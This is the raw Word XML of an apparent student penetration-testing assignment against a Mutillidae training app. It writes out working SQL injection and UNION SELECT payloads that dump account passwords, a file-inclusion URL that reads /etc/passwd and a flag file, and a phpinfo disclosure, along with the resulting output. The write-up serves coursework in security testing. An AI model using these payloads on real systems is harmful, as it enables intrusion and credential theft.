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45" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6454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A64545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 xml:space="preserve">Q1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64545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 xml:space="preserve">Which pages/top 20 controls did you test and how did you compromise </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A64545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them.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A64545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 xml:space="preserve"> What data was returned? Try at minimum 3 different controls to compromise.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr>
        <w:spacing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 was able to exploit following vulnerabilities in the controls:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A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t>                                        1.    A01 - Using SQL injection to extract user info</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64545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A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A645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br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6454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 was able to obtain all the users on the system by exploiting an SQL injection vulnerability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On the user info page (</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tooltip="Link: http://128.198.49.198:8102/mutillidae/index.php?page=user-info.php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  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://128.198.49.198:8102/mutillidae/index.php?page=user-info.php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), a single quote, an invalid character,  caused an error page which showed us which SQL query was used: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SELECT * FROM accounts WHERE username=''' AND password=''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Knowing that we can manipulate the original SQL Query, we can make a query to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mysql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with an OR and a statement that is true.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Query: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 SELECT * FROM accounts WHERE username=''OR 1=1 -- ' AND password=''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Output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 A list of ALL the users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Username=admin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Password=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adminpass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Signature=g0t r00t?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Username=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adrian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Password=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somepassword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Signature=Zombie Films Rock!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Username=john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Password=monkey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  Signature=I like the smell of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confunk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Username=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jeremy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Password=password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 Signature=d1373 1337 speak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br/>
      </w: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br/>
      </w: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br/>
        <w:t>              2. A4 - Broken Access Control - Exploiting an Arbitrary File Inclusion.</w:t>
      </w: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hyperlink r:id="rId6" w:tooltip="Link: http://128.198.49.198:8102/mutillidae/index.php?page=arbitrary-file-inclusion.php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  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://128.198.49.198:8102/mutillidae/index.php?page=arbitrary-file-inclusion.php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The page displayed is decided by the value in the page parameter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So if we want to look at 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etc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/passwd, we just need to replace the value of the page parameter.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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId7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  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://128.198.49.198:8102/mutillidae/index.php?page=/etc/passwd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Output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 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/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daemon:x:2:2:daemon:/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adm:x:3:4:adm:/var/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adm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lp:x:4:7:lp:/var/spool/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lpd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sync:x:5:0:sync:/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:/bin/sync shutdown:x:6:0:shutdown:/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/shutdown halt:x:7:0:halt:/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/halt mail:x:8:12:mail:/var/spool/mail:/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operator:x:11:0:operator:/root:/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games:x:12:100:games:/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usr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/games:/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ftp:x:14:50:FTP User:/var/ftp:/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nobody:x:99:99:Nobody:/:/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avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-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autoipd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dbus:x:81:81:System message bus:/:/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abrt:x:173:173::/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etc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abrt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polkitd:x:999:998:User for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polkitd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apache:x:48:48:Apache:/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usr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/share/httpd:/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libstoragemgmt:x:998:997:daemon account for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libstoragemgmt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:/var/run/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lsm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tss:x:59:59:Account used by the trousers package to sandbox the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tcsd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daemon:/dev/null:/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postfix:x:89:89::/var/spool/postfix:/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sshd:x:74:74:Privilege-separated SSH:/var/empty/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sshd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chrony:x:997:996::/var/lib/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chrony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ntp:x:38:38::/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etc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ntp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tcpdump:x:72:72::/:/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greg:x:1000:1000:greg:/home/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greg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:/bin/bash splunk:x:1001:1001:Splunk Server:/opt/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splunk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:/bin/bash systemd-bus-proxy:x:996:994:systemd Bus Proxy:/:/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systemd-network:x:192:192:systemd Network Management:/:/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rpc:x:32:32:Rpcbind Daemon:/var/lib/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rpcbind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mysql:x:27:27:MariaDB Server:/var/lib/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mysql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But we want: /var/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coursera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/flag.txt,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sooo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..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Output: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 Q29uZ3JhdHVsYXRpb25zLCB5b3UgZ290IHRoZSBmbGFn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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>                                           3. A10 - Unprotected APIs - REST API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Using a REST API client and  following the instructions in </w:t>
      </w:r>
      <w:hyperlink r:id="rId8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  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://128.198.49.198:8102/mutillidae/webservices/rest/ws-user-account.php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 I could obtain a list of all usernames using: an HTTP GET on </w:t>
      </w:r>
      <w:hyperlink r:id="rId9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  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://128.198.49.198:8102/mutillidae/webservices/rest/ws-user-account.php?username=jeremy'+union+se...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+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Result: Result: {Accounts: {[{"username":"jeremy","mysignature":"d1373 1337 speak"},{"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username":"admin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adminpass","mysignature":"g0t r00t?"},{"username":"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adrian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somepassword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":"Zombie </w:t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lastRenderedPageBreak/>
        <w:t>Films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Rock!"},{"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username":"john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monkey","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":"I like the smell of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confunk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jeremy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password","mysignature":"d1373 1337 speak"},{"username":"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bryce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":"I Love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SANS"},{"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username":"samurai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samurai","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":"Carving fools"},{"username":"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jim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":"Rome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is burning"},{"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username":"bobby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":"Hank is my dad"},{"username":"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simba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":"I am a super-cat"},{"username":"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dreveil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":"Preparation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H"},{"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username":"scotty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":"Scotty do"},{"username":"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cal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":"C-A-T-S Cats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Cats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Cats"},{"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username":"john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password","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":"Do the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Duggie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!"},{"username":"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kevin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42","mysignature":"Doug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Adams rocks"},{"username":"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dave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set","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":"Bet on S.E.T. FTW"},{"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username":"patches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tortoise","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":"meow"},{"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username":"rocky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stripes","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":"treats?"},{"username":"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tim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lanmaster53","mysignature":"Because reconnaissance is hard to spell"},{"username":"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ABaker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SoSecret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":"Muffin tops only"},{"username":"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PPan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NotTelling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":"Where is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Tinker?"},{"username":"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CHook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JollyRoger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":"Gator-hater"},{"username":"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james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&lt;3devs","mysignature":"Occupation: Researcher"},{"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username":"ed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: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pentest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","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mysignature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":"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Commandline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KungFu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   anyone?"}]}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6454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:rsidR="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBd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:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr>
        <w:jc w:val="both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 w:rsidRPr="00A64545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Q2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64545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Even though this project is very ambiguous, how did you approach the problem like a black box pen test?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A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Black box penetration testing doesn't require any prior information about the target network or application. Hence as explained in above scenarios, when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tried to retrieve the information from database in an unconventional way,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received results which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should not as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am not an administrator of that application. Hence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tried with a scenario as a </w:t>
      </w:r>
      <w:proofErr w:type="gram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real world</w:t>
      </w:r>
      <w:proofErr w:type="gram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hacker do. And found many issues. This testing is performed to identify the risks and threats from an insiders or outside hacker.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By performing initial analysis of the system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was able to gather system information like </w:t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br/>
        <w:t xml:space="preserve">it's a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linux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(CentOS) system with components like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6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 Apache/2.4.6 (CentOS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6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 OpenSSL/1.0.1e-fips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mod_fcgid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>/2.3.9 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6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PHP/5.4.16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6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the database is 5.5.50-MariaDB (a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mysql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fork)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="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the Information was gathered by exploiting a Sensitive Information Disclosure vulnerability by calling the page for php info:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="Link: http://128.198.49.198:8102/mutillidae/index.php?page=phpinfo.php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http://128.198.49.198:8102/mutillidae/index.php?page=phpinfo.php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Then by playing around with the login form and generating an error by adding a single quote, it was possible to find out the SQL used and attempt to then attempt to manipulate it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1"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For 1st Control: A1-Injection (SQL)&gt;SQL-Extract Data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hyperlink r:id="rId11" w:tooltip="Link: http://128.198.49.198:8102/mutillidae/index.php?page=user-info.php&amp;username=ramregu&amp;password=password&amp;user-info-php-submit-button=View+Account+Details" w:history="1">
        <w:r w:rsidRPr="00A64545">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="2972D1"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://128.198.49.198:8102/mutillidae/index.php?page=user-info.php&amp;username=ramregu&amp;password=password&amp;user-info-php-submit-button=View+Account+Details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Clicked on "Switch to XPath version"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when being on above URL and entered following against Name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Against Name: inserted ' OR 1='1'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Clicked on "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Click Here to View XML"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to my surprise it displayed all the details of the accounts existing in database. see below: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</w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A645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Total 23 records found with Employee id, password, signature, and type of the user. It displayed all the user accounts in the database (except the username and password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created.) -But displaying all other users details along with their employee ID is a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Critical Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6454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proofErr w:type="gramStart"/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>similarly</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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by exploiting the architecture of the system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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performed the vulnerability test of other controls.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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBd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:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pP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</w:pPr>
      <w:r w:rsidRPr="00A64545">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia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Q3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64545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>What worked well? What did not work well?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A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By performing initial analysis of the system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was able to gather system information like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 xml:space="preserve">it's a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linux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(CentOS) system with components like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A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 Apache/2.4.6 (CentOS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A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 OpenSSL/1.0.1e-fips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mod_fcgid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>/2.3.9 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A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PHP/5.4.16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A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the database is 5.5.50-MariaDB (a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mysql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fork)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="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the Information was gathered by exploiting a Sensitive Information Disclosure vulnerability by calling the page for php info:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tooltip="Link: http://128.198.49.198:8102/mutillidae/index.php?page=phpinfo.php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http://128.198.49.198:8102/mutillidae/index.php?page=phpinfo.php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Then by playing around with the login form and generating an error by adding a single quote, it was possible to find out the SQL used and attempt to then attempt to manipulate it.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</w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A645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These very simple vulnerabilities worked really </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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well.I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A64545">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> initially struggled to understand the logic behind using comments to add commands to SQL injection attempts, but with some online guidance, I quickly grasped the concept.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A645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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6454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For 1st Control: A1-Injection (SQL) -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Worked well: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After switching to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"Switch to XPath version"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when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tried to enter ' OR 1='1' against username (Name) on the page to retrieve all the username and passwords from database. I am able to retrieve all the details including Employee id, Name, Password, Type etc.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br/>
        <w:t>For 1st Control: A1-Injection (SQL) -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Did not Work Well is as follows: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When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tried enter ' OR 1='1' when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was on </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64545">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>User Lookup (SQL) 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>it gave me "Authentication Error: Bad user name or password." </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64545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The inputs were relatively easy to </w:t>
      </w:r>
      <w:proofErr w:type="gram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make ,</w:t>
      </w:r>
      <w:proofErr w:type="gram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but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couldn't make then automated and with a pattern , so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guess automation did not worked well. retrieving some raw data is on the success side, but also being completely blocked by malware defenses is a huge minus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6454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A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A645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-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr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A64545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 xml:space="preserve">Q4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64545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Try finding an exploit that allows you to run command injection. If you can, what is located at /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A64545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coursera</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A64545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/flag.txt? Explain how you went about compromising the system to gain information.</w:t>
      </w:r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file </w:t>
      </w:r>
      <w:proofErr w:type="gram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Content:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A64545">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>  Q29uZ3JhdHVsYXRpb25zLCB5b3UgZ290IHRoZSBmbGFn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr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STEP 1: </w:t>
      </w:r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Using the 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the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Arbitrary File Inclusion vulnerability via the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A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Link: http://128.198.49.198:8102/mutillidae/index.php?popUpNotificationCode=BHE1&amp;page=arbitrary-file-inclusion.php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http://128.198.49.198:8102/mutillidae/index.php&amp;page=arbitrary-file-inclusion.php</w:t>
        </w:r>
      </w:hyperlink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</w:r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STEP 2:</w:t>
      </w:r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The page displayed is decided by the value in the page parameter, and if that is the case, we can have a look at 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etc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>/passwd with the URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tooltip="Link: http://128.198.49.198:8102/mutillidae/index.php?page=/etc/passwd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http://128.198.49.198:8102/mutillidae/index.php?page=/etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6454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STEP 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1"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64545">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>output: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/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sbin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>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nologin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 xml:space="preserve"> daemon:x:2:2:daemon...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It works, and I can see all the system usernames from that file, so I just had to replace the filename with /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A64545">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>coursera</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A64545">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/flag.txt, resulting in</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64545">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>the URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tooltip="Link: http://128.198.49.198:8102/mutillidae/index.php?page=/var/coursera/flag.txt" w:history="1">
        <w:r w:rsidRPr="00A6454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http://128.198.49.198:8102/mutillidae/index.php?page=/var/coursera/flag.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:before="100" w:beforeAutospacing="1"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:rsidR="00A64545" w:rsidRPr="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="315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A64545" w:rsidRDefault="00A64545" w:rsidP="00A6454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:rsidR="00A64545" w:rsidRDefault="00A64545" w:rsidP="00A6454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A64545" w:rsidRDefault="00A64545" w:rsidP="00A64545"/>
    <w:sectPr w:rsidR="00A6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3D22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEC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F00B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="975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E7CE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C52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45"/>
    <w:rsid w:val="002A7337"/>
    <w:rsid w:val="00690FEB"/>
    <w:rsid w:val="00A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A69E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B4FD0B53-87EA-483B-81D3-3BCDFE0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45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45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8.198.49.198:8102/mutillidae/webservices/rest/ws-user-account.php" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://128.198.49.198:8102/mutillidae/index.php&amp;page=arbitrary-file-inclus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8.198.49.198:8102/mutillidae/index.php?page=/etc/passwd" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://128.198.49.198:8102/mutillidae/index.php?page=phpinfo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8.198.49.198:8102/mutillidae/index.php?page=arbitrary-file-inclusion.php" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://128.198.49.198:8102/mutillidae/index.php?page=user-info.php&amp;username=ramregu&amp;password=password&amp;user-info-php-submit-button=View+Account+Details" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://128.198.49.198:8102/mutillidae/index.php?page=user-info.php" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://128.198.49.198:8102/mutillidae/index.php?page=/var/coursera/flag.txt" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://128.198.49.198:8102/mutillidae/index.php?page=php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8.198.49.198:8102/mutillidae/webservices/rest/ws-user-account.php?username=jeremy%27+union+select+concat%28username,%27+:+%27,+password%29,mysignature+from+accounts+--" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://128.198.49.198:8102/mutillidae/index.php?page=/etc/pass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ALLOKIK PRANSHU</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ALLOKIK PRANSHU</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-18T06:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-18T06:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>